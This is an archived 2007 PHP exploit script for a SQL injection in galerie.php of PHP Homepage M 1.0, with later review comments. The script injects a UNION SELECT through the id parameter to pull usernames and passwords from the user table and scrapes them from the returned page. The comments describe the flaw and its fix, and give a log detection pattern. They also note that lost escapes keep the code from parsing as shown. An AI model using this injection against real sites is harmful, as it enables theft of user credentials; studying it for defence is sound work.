
# Title : PHP Homepage M 1.0 galerie.php Remote SQL Injection Exploit
# Published : 2007-10-08
# Author : [PHCN] Mahjong


<?php
// Command-line proof of concept (2007) for a SQL injection in the id parameter
// of galerie.php in PHP Homepage M 1.0. Arguments: base URL, path, numeric user id.
// NOTE(review): this archived copy lost its backslash escapes during extraction
// (banner line endings, quoting inside the two strpos() calls), so it does not
// parse as shown; read it as a description of the flaw, not as runnable code.
if ($argv[1] == '')
{
// No target given: print the usage banner. The banner states the precondition
// the author relied on: magic_quotes_gpc must be off on the server.
echo "--PHP Homepage M V.1.0 galerie.php Exploit----n";
echo "only with magic_quotes_gpc OFFn";
echo "by [PHCN] Mahjongn";
echo "Usage : phpHPmv1.php http://127.0.0.1 / 1n";
echo '----------------------------------------------';
}
else
{
$host = $argv[1];
$path = $argv[2];
$userid = $argv[3];

// The id value carries a single quote followed by a UNION SELECT over the
// username and passwort columns of the user table, filtered by user id.
// NOTE(review): this implies galerie.php places id inside a quoted SQL string
// without escaping; the vulnerable file itself is not shown on this page.
// Application-side fix: bind id as a query parameter (or cast it to int).
// magic_quotes_gpc is not a defence to rely on; it was removed in PHP 5.4.
// Detection: access-log entries for galerie.php with act=show and an id
// containing a quote together with UNION+SELECT.
$data = $host.$path."galerie.php?act=show&id=99999'+UNION+SELECT+username,passwort,passwort,passwort+FROM+user+WHERE+U ID='$userid";
// One plain GET with no stream context; a failed fetch is not checked.
$data = file_get_contents($data);
// The injected passwort column is read back from the rendered page: the code
// looks for the image tag whose src starts with bilder/ and keeps the text up
// to the first dot.
// NOTE(review): whether passwort is stored hashed cannot be told from here.
$pw = substr($data,strpos($data,'<img border="0" src='bilder/')+28,30);
$pw = explode('.',$pw);
$pw = $pw[0];
// The username is taken from the centred h1 heading that follows the echoed
// UID marker in the response.
$user = substr($data,strpos($data,'UID=''.$userid.''<h1 align="center">',30));
$user = explode('>',$user);
// Reverse, drop four characters, reverse again: trims the last four characters
// of the captured fragment (presumably the start of the closing tag).
$user = strrev($user[1]);
$user = substr($user,4,100);
$user = strrev($user);

// Report the values recovered from the response.
echo "--EXPLOIT FINISHED--n";
echo "userid : $useridn";
echo "username: $usern";
echo "password: $pwn";
echo '--------------------';
}


?>
